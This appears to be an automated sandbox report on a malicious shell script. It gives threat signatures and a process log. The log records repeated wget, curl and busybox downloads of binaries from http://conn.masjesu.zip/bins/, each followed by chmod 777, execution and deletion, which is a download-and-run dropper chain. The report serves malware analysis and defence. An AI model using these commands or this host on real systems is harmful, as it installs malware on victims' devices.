Analysis Overview
SHA256
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da
Threat Level: Shows suspicious behavior
The file 840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:06
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 02:06
Reported
2024-10-18 02:08
Platform
debian9-mipsel-20240729-en
Max time kernel
138s
Max time network
137s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | N/A |
| N/A | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | N/A |
| N/A | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | N/A |
| N/A | /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | N/A |
| N/A | /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | N/A |
| N/A | /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | N/A |
| N/A | /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | N/A |
| N/A | /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | N/A |
| N/A | /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | N/A |
| N/A | /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | N/A |
| N/A | /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | N/A |
| N/A | /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf | /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf | N/A |
| N/A | /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU | /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU | N/A |
| N/A | /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe | /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe | N/A |
| N/A | /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | N/A |
| N/A | /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | N/A |
| N/A | /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | N/A |
| N/A | /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | N/A |
| N/A | /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe | /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe | N/A |
| N/A | /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | N/A |
| N/A | /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | N/A |
| N/A | /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf | /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf | N/A |
| N/A | /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU | /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU | N/A |
| N/A | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | N/A |
| N/A | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | N/A |
| N/A | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | N/A |
| N/A | /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | N/A |
| N/A | /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf | /usr/bin/curl | N/A |
Processes
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/chmod
[chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
[./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/bin/rm
[rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/chmod
[chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
[./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/bin/rm
[rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/chmod
[chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
[./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/bin/rm
[rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/bin/chmod
[chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
[./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/bin/rm
[rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/bin/chmod
[chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
[./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/bin/rm
[rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/bin/chmod
[chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
[./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/bin/rm
[rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/bin/chmod
[chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
[./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/bin/rm
[rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/bin/chmod
[chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
[./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/bin/rm
[rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/bin/chmod
[chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
[./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/bin/rm
[rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/bin/chmod
[chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
[./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/bin/rm
[rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/bin/chmod
[chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
[./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/bin/rm
[rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/bin/chmod
[chmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
[./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/bin/rm
[rm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/bin/chmod
[chmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU
[./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/bin/rm
[rm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/bin/chmod
[chmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
[./uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/bin/rm
[rm uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/bin/chmod
[chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
[./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/bin/rm
[rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/bin/chmod
[chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
[./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/bin/rm
[rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/bin/chmod
[chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
[./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/bin/rm
[rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/bin/chmod
[chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
[./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/bin/rm
[rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/bin/chmod
[chmod 777 uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe]
/tmp/uJGsfcn78H2Kio2mqHTsTmvgzSiRStmMMe
